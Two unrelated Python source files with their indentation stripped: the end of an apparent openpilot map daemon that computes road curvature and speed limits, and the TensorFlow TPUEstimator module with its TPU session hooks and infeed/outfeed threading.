# Index of closest point
closest = np.argmin(np.linalg.norm(pnts, axis=1))
dist_to_closest = pnts[closest, 0] # We can use x distance here since it should be close
# Compute distance along path
dists = list()
dists.append(0)
for p, p_prev in zip(pnts, pnts[1:, :]):
dists.append(dists[-1] + np.linalg.norm(p - p_prev))
dists = np.asarray(dists)
dists = dists - dists[closest] + dist_to_closest
dists = dists[1:-1]
close_idx = np.logical_and(dists > 0, dists < 500)
dists = dists[close_idx]
curvature = curvature[close_idx]
if len(curvature):
# TODO: Determine left or right turn
curvature = np.nan_to_num(curvature)
# Outlier rejection
new_curvature = np.percentile(curvature, 90, interpolation='lower')
k = 0.6
upcoming_curvature = k * upcoming_curvature + (1 - k) * new_curvature
in_turn_indices = curvature > 0.8 * new_curvature
if np.any(in_turn_indices):
dist_to_turn = np.min(dists[in_turn_indices])
else:
dist_to_turn = 999
else:
upcoming_curvature = 0.
dist_to_turn = 999
query_lock.release()
dat = messaging.new_message()
dat.init('liveMapData')
if last_gps is not None:
dat.liveMapData.lastGps = last_gps
if cur_way is not None:
dat.liveMapData.wayId = cur_way.id
# Speed limit
max_speed = cur_way.max_speed()
if max_speed is not None:
#new_latitude = gps.latitude + (MAPS_LOOKAHEAD_DISTANCE * cos(heading/180*3.14159265358979) / (6371010 + gps.altitude)) * (180 / 3.14159265358979)
#new_longitude = gps.longitude + (MAPS_LOOKAHEAD_DISTANCE * sin(heading/180*3.14159265358979) / (6371010 + gps.altitude)) * (180 / 3.14159265358979) / cos(gps.latitude * 3.14159265358979/180)
ahead_speed = None
max_speed_ahead = None
max_speed_ahead_dist = None
#ahead_speed = Way.closest(last_query_result, new_latitude, new_longitude, heading, ahead_speed)
#if ahead_speed is not None and ahead_speed < max_speed:
# max_speed_ahead = ahead_speed.max_speed()
# print "speed ahead found"
# print max_speed_ahead
# max_speed_ahead_dist = cur_way.distance_to_closest_node(lat, lon, heading, pnts)
# print "distance"
# print max_speed_ahead_dist
if abs(max_speed - max_speed_prev) > 0.1:
speedLimittrafficvalid = False
max_speed_prev = max_speed
# TODO: use the function below to anticipate upcoming speed limits
max_speed_ahead, max_speed_ahead_dist = cur_way.max_speed_ahead(max_speed, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
if max_speed_ahead is not None and max_speed_ahead_dist is not None:
dat.liveMapData.speedLimitAheadValid = True
dat.liveMapData.speedLimitAhead = float(max_speed_ahead)
dat.liveMapData.speedLimitAheadDistance = float(max_speed_ahead_dist)
advisory_max_speed = cur_way.advisory_max_speed()
if speedLimittrafficAdvisoryvalid:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = speedLimittrafficAdvisory / 3.6
else:
if advisory_max_speed is not None:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = advisory_max_speed
# Curvature
dat.liveMapData.curvatureValid = curvature_valid
dat.liveMapData.curvature = float(upcoming_curvature)
dat.liveMapData.distToTurn = float(dist_to_turn)
if road_points is not None:
dat.liveMapData.roadX, dat.liveMapData.roadY = road_points
if curvature is not None:
dat.liveMapData.roadCurvatureX = [float(x) for x in dists]
dat.liveMapData.roadCurvature = [float(x) for x in curvature]
if speedLimittrafficvalid:
if speedLimittraffic > 0.1:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = speedLimittraffic / 3.6
map_valid = False
else:
speedLimittrafficvalid = False
else:
if max_speed is not None:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = max_speed
#print "speedLimittraffic_prev"
#print speedLimittraffic_prev
#print "speedLimittraffic"
#print speedLimittraffic
#print "max_speed_prev"
#print max_speed_prev
#print "max_speed"
#print max_speed
#print "speedLimittrafficvalid"
#if speedLimittrafficvalid:
# print "True"
#else:
# print "False"
dat.liveMapData.mapValid = map_valid
map_data_sock.send(dat.to_bytes())
def main(gctx=None):
params = Params()
dongle_id = params.get("DongleId")
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
crash.install()
main_thread = threading.Thread(target=mapsd_thread)
main_thread.daemon = True
main_thread.start()
q_thread = threading.Thread(target=query_thread)
q_thread.daemon = True
q_thread.start()
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
if ops.get_to_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Please use tf.contrib.summary instead of tf.summary '
'inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather than a constant, is to allow
TPUEstimator to adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1st TPU execution: iterations_per_loop = 4
- 2nd TPU execution: iterations_per_loop = 4
- 3rd TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multiple iterations_per_loop variables are found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator.evaluate increases the eval step by 1 per Session.run, so we add the remaining difference here.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for an MNIST example of how to specify
the `eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function; the function returns a list of Tensors. `host_call`
currently works for train() and evaluate(). The Tensors returned by the function
are executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
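# Illustrative sketch (not part of this module): returning a TPUEstimatorSpec
# with the eval_metrics tuple described in the class docstring. Assumes
# `import tensorflow as tf` (1.x) and a user-defined build_network(); all names
# below are placeholders.
#
#   def metric_fn(labels, logits):
#       predictions = tf.argmax(logits, axis=-1)
#       return {'accuracy': tf.metrics.accuracy(labels=labels, predictions=predictions)}
#
#   def model_fn(features, labels, mode, params):
#       logits, loss, train_op = build_network(features, labels, params)
#       return tf.estimator.tpu.TPUEstimatorSpec(
#           mode=mode,
#           loss=loss,
#           train_op=train_op,
#           eval_metrics=(metric_fn, [labels, logits]))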
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initializes and shuts down the TPU system.
2. launches and joins the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None,
outfeed_every_n_steps=1):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._tpu_compile_op = tpu_compile_op
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on the TPU directly. Re-initializing
# the TPU would cause variable corruption since the previously allocated memory
# might be overwritten for other purposes.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
self._outfeed_every_n_steps = outfeed_every_n_steps
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
step_counter = 0
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
if step_counter % self._outfeed_every_n_steps == 0:
session.run(self._dequeue_ops)
step_counter += 1
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with the
following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of (`value`, `unit`) that
represents either the number of iterations or the time in seconds to run
the optimizer per loop, depending on whether `unit` is `count` or
`seconds` respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError(
'Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit`.')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations count is computed by choosing the smaller of
(`final_step` - `global_step`) and the initial estimated iterations
returned by the estimator (1 by default).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
logging.info("ElapsedTime: %.3f", elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for the prediction model, but it makes
# TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
